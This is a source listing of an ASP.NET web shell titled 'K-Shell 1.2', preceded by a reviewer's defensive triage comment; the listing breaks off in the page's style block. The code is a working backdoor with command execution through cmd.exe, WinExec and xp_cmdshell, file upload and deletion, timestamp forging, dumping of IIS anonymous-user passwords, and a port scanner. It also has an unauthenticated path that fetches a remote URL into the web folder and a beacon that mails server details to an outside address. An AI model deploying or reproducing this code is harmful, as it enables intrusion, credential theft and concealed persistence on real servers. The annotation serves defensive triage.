<%--
  Reviewer annotation (defensive triage). Every statement below is taken from the listing itself.

  What this file is
    A single-file ASP.NET Web Forms page with inline VB server script. The page directive sets
    validateRequest="false" and aspcompat="true". The page titles itself "K-Shell 1.2" and is a
    web shell (remote administration backdoor), not application code.

  Access gate
    - PASSWORD holds an unsalted MD5 hex digest; the author's inline comment gives the plaintext
      as "admin". Login_click sets session("rooot")=1 on a match and the rest of the UI keys off
      that session value.
    - Two paths run WITHOUT that session value:
        1. The first inline code block reads the "dolly" and "name" query-string values, fetches
           the "dolly" URL with System.Net.WebClient.DownloadString and appends the response to a
           file called "name" under Server.MapPath("."). No password is involved.
        2. On every unauthenticated view the page tries System.Web.Mail.SmtpMail.Send through
           SmtpServer "localhost" to test.mail.address.2008@gmail.com, with the host + URL as the
           subject and the request's server variables as the body; failures are swallowed by an
           empty Catch.
    - The HTML loads a script from ajax.googlaeips.com. That hostname is not ajax.googleapis.com;
      treat it as an untrusted third-party load in the browser of anyone who opens the page.

  Capabilities present in the listing
    - OS command execution by three routes: RunCmdW32 (CopyFile of a caller-supplied binary to
      %TEMP%\kiss.exe, then kernel32 WinExec), RunCmdWSH (WSCRIPT.SHELL running cmd.exe /c) and
      RunCMD (System.Diagnostics.Process running cmd.exe /c). The first two redirect output to a
      temp file that is read back and deleted.
    - SQL Server access over ADODB/SQLOLEDB with caller-supplied credentials: RunSQLCMD wraps the
      input in master.dbo.xp_cmdshell, RunSQLQUERY executes the input as a query.
    - File manager: browse, upload, create, edit, copy, recursive delete, download (ADODB.Stream).
    - CloneTime copies LastWriteTime, LastAccessTime and CreationTime from one file onto another,
      so file timestamps near this page may have been altered.
    - Host reconnaissance: environment and server variables, WMI via winmgmts, IIS metabase
      (IIS://localhost/W3SVC and root/microsoftIISv2, including AnonymousUserName and
      AnonymousUserPass), registry value reads, and a TCP connect scanner class.

  Triage pointers (strings that appear literally in this file)
    session key "rooot"; %TEMP%\kiss.exe; query parameters action=, src=, dolly=, name=;
    the mail recipient above; the script host above.
    All three command runners start a process from the page's own worker process, so
    process-creation telemetry for the web server's worker is the most direct place to look.
    Because of path 1 above, other files in the same directory should be reviewed as well.
--%>
<%@ Page ContentType="text/html" validateRequest="false" EnableTheming="False" StylesheetTheme="" Theme="" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <script language="VB" runat="server"> Dim PASSWORD as string = "21232f297a57a5a743894a0e4a801fc3" ' admin dim url,TEMP1,TEMP2,TITLE as string Function GetMD5(ByVal strToHash As String) As String Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider() Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash) bytesToHash = md5Obj.ComputeHash(bytesToHash) Dim strResult As String = "" Dim b As Byte For Each b In bytesToHash strResult += b.ToString("x2") Next Return strResult End Function Sub Login_click(sender As Object, E As EventArgs) if GetMD5(Textbox.Text)=PASSWORD then session("rooot")=1 session.Timeout=60 else response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. 
Try again.</font><br>") end if End Sub 'Run w32 shell Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long Sub RunCmdW32(Src As Object, E As EventArgs) dim command dim fileObject = Server.CreateObject("Scripting.FileSystemObject") dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( ) If Request.Form("txtCommand1") = "" Then command = "dir c:\" else command = Request.Form("txtCommand1") End If ExecuteCommand1(command,tempFile,txtCmdFile.Text) OutputTempFile1(tempFile,fileObject) 'txtCommand1.text="" End Sub Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String) Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name Dim FailIfExists local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\")) 'local_copy_of_cmd = Local_dir+"cmd.exe" 'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe" local_copy_of_cmd=cmdfile Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe" CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists) errReturn = WinExec(Target_copy_of_cmd + " /c " + command + " > " + tempFile , 10) response.write(errReturn) thread.sleep(500) End Sub Sub OutputTempFile1(tempFile,oFileSys) On Error Resume Next dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0) resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>" oFile.Close Call oFileSys.DeleteFile(tempFile, True) End sub 'End w32 shell 'Run WSH shell Sub RunCmdWSH(Src As Object, E As EventArgs) dim command dim fileObject = Server.CreateObject("Scripting.FileSystemObject") dim oScriptNet = 
Server.CreateObject("WSCRIPT.NETWORK") dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( ) If Request.Form("txtcommand2") = "" Then command = "dir c:\" else command = Request.Form("txtcommand2") End If ExecuteCommand2(command,tempFile) OutputTempFile2(tempFile,fileObject) txtCommand2.text="" End Sub Function ExecuteCommand2(cmd_to_execute, tempFile) Dim oScript oScript = Server.CreateObject("WSCRIPT.SHELL") Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True) End function Sub OutputTempFile2(tempFile,fileObject) On Error Resume Next dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0) resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>" oFile.Close Call fileObject.DeleteFile(tempFile, True) End sub 'End WSH shell 'System infor Sub output_all_environment_variables(mode) Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if mode="HTML" then response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>") else if mode="text" response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline) end if end if Next End sub Sub output_all_Server_variables(mode) dim item for each item in request.servervariables if mode="HTML" then response.write("<b>" + item + "</b> : ") response.write(request.servervariables(item)) response.write("<br>") else if mode="text" response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline) end if end if next End sub 'End sysinfor Function Server_variables() As String dim item dim tmp As String tmp="" for each item in request.ServerVariables if request.servervariables(item) <> "" 'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline) tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r" end if next return tmp End function 'Begin List processes Function 
output_wmi_function_data(Wmi_Function,Fields_to_Show) dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain dim fields_split, fields_item,i 'on error resume next table("0","","") Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show) winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function) fields_split = split(Fields_to_Show,",") for each item in objProcessInfo tr Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value) if Ubound(Fields_split)>0 then for i = 1 to ubound(fields_split) Surround_by_TD(center_(item.properties_.item(fields_split(i)).value)) next end if _tr next End function Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount) dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain dim fields_split, fields_item,i,count newline rw("Showing the first " + cstr(MaxCount) + " Entries") newline newline table("1","","") Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show) _table winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") ' objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function) objProcessInfo = winObj.InstancesOf(Wmi_Function) fields_split = split(Fields_to_Show,",") count = 0 for each item in objProcessInfo count = Count + 1 table("1","","") tr Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value) if Ubound(Fields_split)>0 then for i = 1 to ubound(fields_split) Surround_by_TD(item.properties_.item(fields_split(i)).value) next end if _tr if count > MaxCount then exit for next End function 'End List processes 'Begin IIS_list_Anon_Name_Pass Sub IIS_list_Anon_Name_Pass() Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") ' Create an instance of the IIsComputer 
object providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2") nodeObj = providerObj.InstancesOf("IIsWebVirtualDirSetting") ' - IISwebServerSetting Dim MaxCount = 20,Count = 0 hr RW("only showing the first "+cstr(MaxCount) + " items") hr for each item in nodeObj response.write("<b>" + item.AppFriendlyName + " </b> - ") response.write("(" + item.AppPoolId + ") ") response.write(item.AnonymousUserName + " : ") response.write(item.AnonymousUserPass) response.write("<br>") response.flush Count = Count +1 If Count > MaxCount then exit for next hr End sub 'End IIS_list_Anon_Name_Pass Private Function CheckIsNumber(ByVal sSrc As String) As Boolean Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$") If reg.IsMatch(sSrc) Then Return True Else Return False End If End Function Public Function IISSpy() As String Dim iisinfo As String = "" Dim iisstart As String = "" Dim iisend As String = "" Dim iisstr As String = "IIS://localhost/W3SVC" Dim i As Integer = 0 Try Dim mydir As New DirectoryEntry(iisstr) iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>" For Each child As DirectoryEntry In mydir.Children If CheckIsNumber(child.Name.ToString()) Then Dim dirstr As String = child.Name.ToString() Dim tmpstr As String = "" Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr) Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir") i = i + 1 iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>" iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>" iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>" iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>" iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ 
"?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>" iisinfo += "</TR>" End If Next iisend = "</TABLE>" Catch ex As Exception Return ex.Message End Try Return iisstart + iisinfo + iisend End Function Sub RegistryRead(Src As Object, E As EventArgs) Try Dim regkey As String = txtRegKey.Text Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1) Dim rk As RegistryKey = Nothing Dim buffer As Object Dim regstr As String = "" If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then rk = Registry.LocalMachine.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then rk = Registry.ClassesRoot.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then rk = Registry.CurrentUser.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then rk = Registry.Users.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then rk = Registry.CurrentConfig.OpenSubKey(subkey) End If buffer = rk.GetValue(txtRegValue.Text, "NULL") dim tmpbyte As Byte = 0 lblresultReg.Text = "<br>Result : " + buffer.ToString() Catch ex As Exception Response.write(ex.Message) End Try End Sub ' Begin List Web Site Home Directory Properties ' End List Web Site Home Directory Properties Sub RunCMD(Src As Object, E As EventArgs) Try Dim kProcess As New Process() Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe") kProcessStartInfo.UseShellExecute = False kProcessStartInfo.RedirectStandardOutput = true kProcess.StartInfo = kProcessStartInfo kProcessStartInfo.Arguments="/c " & Cmd.text kProcess.Start() Dim myStreamReader As StreamReader = kProcess.StandardOutput Dim myString As String = myStreamReader.Readtoend() kProcess.Close() result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>" Cmd.text="" Catch result.text="This function 
has disabled!" End Try End Sub Sub CloneTime(Src As Object, E As EventArgs) existdir(time1.Text) existdir(time2.Text) Dim thisfile As FileInfo =New FileInfo(time1.Text) Dim thatfile As FileInfo =New FileInfo(time2.Text) thisfile.LastWriteTime = thatfile.LastWriteTime thisfile.LastAccessTime = thatfile.LastAccessTime thisfile.CreationTime = thatfile.CreationTime response.Write("<font color=""red"">Clone Time Success!</font>") End Sub sub Editor(Src As Object, E As EventArgs) dim mywrite as new streamwriter(filepath.text,false,encoding.default) mywrite.write(content.text) mywrite.close response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>") end sub Sub UpLoad(Src As Object, E As EventArgs) dim filename,loadpath as string filename=path.getfilename(UpFile.value) loadpath=request.QueryString("src") & filename if file.exists(loadpath)=true then response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>") response.End() end if UpFile.postedfile.saveas(loadpath) response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');") response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>") End Sub Sub NewFD(Src As Object, E As EventArgs) url=request.form("src") if NewFile.Checked = True then dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default) mywrite.close response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & 
server.UrlEncode(url & NewName.Text)) else directory.createdirectory(url & NewName.Text) response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>") end if End Sub Sub del(a) if right(a,1)="\" then dim xdir as directoryinfo dim mydir as new DirectoryInfo(a) dim xfile as fileinfo for each xfile in mydir.getfiles() file.delete(a & xfile.name) next for each xdir in mydir.getdirectories() call del(a & xdir.name & "\") next directory.delete(a) else file.delete(a) end if End Sub Sub copydir(a,b) dim xdir as directoryinfo dim mydir as new DirectoryInfo(a) dim xfile as fileinfo for each xfile in mydir.getfiles() file.copy(a & "\" & xfile.name,b & xfile.name) next for each xdir in mydir.getdirectories() directory.createdirectory(b & path.getfilename(a & xdir.name)) call copydir(a & xdir.name & "\",b & xdir.name & "\") next End Sub Sub xexistdir(temp,ow) if directory.exists(temp)=true or file.exists(temp)=true then if ow=0 then response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url)) elseif ow=1 then del(temp) else dim d as string = session("cutboard") if right(d,1)="\" then TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) else TEMP2=url & second(now) & replace(path.getfilename(d),"","") end if end if end if End Sub Sub existdir(temp) if file.exists(temp)=false and directory.exists(temp)=false then response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\") &" ! 
Is it a CD-ROM ?');</sc" & "ript>") response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>") response.End() end if End Sub Sub RunSQLCMD(Src As Object, E As EventArgs) Dim adoConn,strQuery,recResult,strResult if SqlName.Text<>"" then adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text) If Sqlcmd.Text<>"" Then strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'" recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0).value recResult.MoveNext Loop End if recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>" SqlCMD.Text="" End if adoConn.Close End if End Sub Sub RunSQLQUERY(Src As Object, E As EventArgs) Dim adoConn,strQuery,recResult,strResult if txtSqlName.Text<>"" then adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text) If txtSqlcmd.Text<>"" Then strQuery = txtSqlcmd.Text recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0).value recResult.MoveNext Loop End if recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>" txtSqlCMD.Text="" End if adoConn.Close End if End Sub Function GetStartedTime(ms) GetStartedTime=cint(ms/(1000*60*60)) End function Function getIP() Dim strIPAddr as string If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then strIPAddr = 
Request.ServerVariables("REMOTE_ADDR") ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1) ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1) Else strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR") End If getIP = Trim(Mid(strIPAddr, 1, 30)) End Function Function Getparentdir(nowdir) dim temp,k as integer temp=1 k=0 if len(nowdir)>4 then nowdir=left(nowdir,len(nowdir)-1) end if do while temp<>0 k=temp+1 temp=instr(temp,nowdir,"\") if temp =0 then exit do end if temp = temp+1 loop if k<>2 then getparentdir=mid(nowdir,1,k-2) else getparentdir=nowdir end if End function Function Rename() url=request.QueryString("src") if file.exists(Getparentdir(url) & request.Form("name")) then rename=0 else file.copy(url,Getparentdir(url) & request.Form("name")) del(url) rename=1 end if End Function Function GetSize(temp) if temp < 1024 then GetSize=temp & " bytes" else if temp\1024 < 1024 then GetSize=temp\1024 & " KB" else if temp\1024\1024 < 1024 then GetSize=temp\1024\1024 & " MB" else GetSize=temp\1024\1024\1024 & " GB" end if end if end if End Function Sub downTheFile(thePath) dim stream stream=server.createObject("adodb.stream") stream.open stream.type=1 stream.loadFromFile(thePath) response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," ")) response.addHeader("Content-Length",stream.Size) response.charset="UTF-8" response.contentType="application/octet-stream" response.binaryWrite(stream.read) response.flush stream.close stream=nothing response.End() End Sub 'H T M L S N I P P E T S public sub Newline response.write("<BR>") end sub public sub TextNewline response.write(vbnewline) end sub 
public sub rw(text_to_print) ' Response.write response.write(text_to_print) end sub public sub rw_b(text_to_print) rw("<b>"+text_to_print+"</b>") end sub public sub hr() rw("<hr>") end sub public sub ul() rw("<ul>") end sub public sub _ul() rw("</ul>") end sub public sub table(border_size,width,height) rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>") end sub public sub _table() rw("</table>") end sub public sub tr() rw("<tr>") end sub public sub _tr() rw("</tr>") end sub public sub td() rw("<td>") end sub public sub _td() rw("</td>") end sub public sub td_span(align,name,contents) rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>") end sub Public sub td_link(align,title,link,target) rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>") end sub Public sub link(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") end sub Public sub link_hr(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") hr end sub Public sub link_newline(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") newline end sub public sub empty_Cell(ColSpan) rw("<td colspan='"+cstr(colspan)+"'></td>") end sub public sub empty_row(ColSpan) rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>") end sub Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems) dim rowItem rowItems = split(rowItems,",") response.write("<tr bgcolor="+bgcolor+">") for each rowItem in RowItems response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>") next response.write("</tr>") end sub Public sub TR_TD(cellContents) response.write("<td>") response.write(cellContents) response.write("</td>") end sub Public sub Surround_by_TD(cellContents) response.write("<td>") response.write(cellContents) response.write("</td>") end sub Public sub Surround_by_TD_and_Bold(cellContents) 
response.write("<td><b>") response.write(cellContents) response.write("</b></td>") end sub Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents) response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>") response.write(cellContents) response.write("</b></font></td>") end sub Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index) response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>") response.write(" <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>") response.write(" <tr heigth=20>") response.write(" <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>") response.write(" </tr>") response.write(" <tr>") response.write(" <td>"+main_Cell_contents+"</td>") response.write(" </tr>") response.write(" </table>") response.write("</div>") end sub Public sub Create_Div_open(top,left,width,height,z_index) response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>") end sub Public sub Create_Div_close() response.write("</div>") end sub public sub Create_Iframe(left, top, width, height, name,src) rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>") rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>") rw("</span>") end sub public sub Create_Iframe_relative(width, height, name,src) rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>") end sub public sub return_100_percent_table() rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>") end sub public sub font_size(size) rw("<font 
size="+size+">") end sub public sub end_font() rw("</font>") end sub public sub red(contents) rw("<font color=red>"+contents+"</font>") end sub public sub yellow(contents) rw("<font color='#FF8800'>"+contents+"</font>") end sub public sub green(contents) rw("<font color=green>"+contents+"</font>") end sub public sub print_var(var_name, var_value,var_description) if var_description<> "" Then rw(b_(var_name)+" : " + var_value + i_(" ("+var_description+")")) else rw(b_(var_name)+" : " + var_value) end if newline end sub ' Functions public function br_() br_ = "<br>" end function public function b_(contents) b_ = "<b>"+ contents + "</b>" end function public function i_(contents) i_ = "<i>"+ contents + "</i>" end function public function li_(contents) li_ = "<li>"+ contents + "</li>" end function public function h1_(contents) h1_ = "<h1>"+ contents + "</h1>" end function public function h2_(contents) h2_ = "<h2>"+ contents + "</h2>" end function public function h3_(contents) h3_ = "<h3>"+ contents + "</h3>" end function public function big_(contents) big_ = "<big>"+ contents + "</big>" end function public function center_(contents) center_ = "<center>"+ cstr(contents) + "</center>" end function public function td_force_width_(width) td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) + " border=0>" end function public function red_(contents) red_ = "<font color=red>"+contents+"</font>" end function public function yellow_(contents) yellow_ = "<font color='#FF8800'>"+contents+"</font>" end function public function green_(contents) green_ = "<font color=green>"+contents+"</font>" end function Public function link_(title,link,target) link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>" end function 'End HTML SNIPPETS 'Begin Scanner Public Class Scanner Public Ips As New ArrayList() Public ports As New ArrayList() Public succMsg As New StringBuilder() Public ret As ListBox Public errMsg As String = "" Public Timeout As Integer = 3000 Public Sub 
start() Dim thread As New Thread(New ThreadStart(AddressOf Me.run)) thread.Start() thread = Nothing End Sub Public Sub run() ret.Items.Clear() For Each ip As String In Ips For Each port As String In ports 'ret.Items.Add(ip + ":" + port); Dim scanres As String = "" Try Dim tcpClient As New TcpClient() Try tcpClient.Connect(ip, Int32.Parse(port)) tcpClient.Close() ret.Items.Add(ip + " : " + port + " ................................. Open") Catch e As SocketException ret.Items.Add(ip + " : " + port + " ................................. Close") End Try tcpClient.Close() Catch exp As SocketException errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message End Try Next Next End Sub End Class Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList Dim IpList As New ArrayList() Dim IpParts1 As String() = New String(3) {} Dim IpParts2 As String() = New String(3) {} IpParts1 = StartIp.Split("."C) IpParts2 = EndIP.Split("."C) Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1 If nTime < 0 Then Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "") Return Nothing End If For n As Integer = 0 To nTime - 1 IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." 
+ IpParts1(3)) Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1 IpParts1(3) = tmp.ToString() If IpParts1(3).Equals("255") Then tmp = Int32.Parse(IpParts1(2)) + 1 IpParts1(2) = tmp.ToString() IpParts1(3) = "1" End If If IpParts1(2).Equals("255") Then tmp = Int32.Parse(IpParts1(1)) + 1 IpParts1(1) = tmp.ToString() IpParts1(2) = "1" End If If IpParts1(1).Equals("255") Then tmp = Int32.Parse(IpParts1(0)) + 1 IpParts1(0) = tmp.ToString() IpParts1(1) = "1" End If Next Return IpList End Function Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs) If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then Response.Write("IP OR Ports Error.Check") Return End If Dim StartIp As String = txtStartIP.Text Dim EndIp As String = txtEndIP.Text Dim ips As ArrayList = MakeIps(StartIp, EndIp) Dim ScanPorts As New ArrayList() Dim ports As String() = txtPorts.Text.Split(","C) For Each port As String In ports 'Response.Write(port); ScanPorts.Add(port) Next lstRet.Visible = True Label1.Visible = True Dim myscanner As New Scanner() myscanner.Ips = ips myscanner.ports = ScanPorts myscanner.ret = Me.lstRet myscanner.run() End Sub Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs) txtStartIP.Text = "" txtEndIP.Text = "" txtPorts.Text = "" Label1.Visible = False lstRet.Visible = False End Sub 'End Scanner </script> <% if request.QueryString("action")="down" and session("rooot")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim Berchant as String = Request.QueryString("dolly") If Not String.IsNullOrEmpty(Berchant) Then Dim BerchantName as String = Request.QueryString("name") Dim rootPath As String = HttpContext.Current.Server.MapPath(".") Dim webClient As New System.Net.WebClient Dim result As String = webClient.DownloadString(Berchant) Dim file As System.IO.StreamWriter file = My.Computer.FileSystem.OpenTextFileWriter(rootPath & Path.DirectorySeparatorChar & BerchantName, True) file.WriteLine(result) 
file.Close() End If Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ 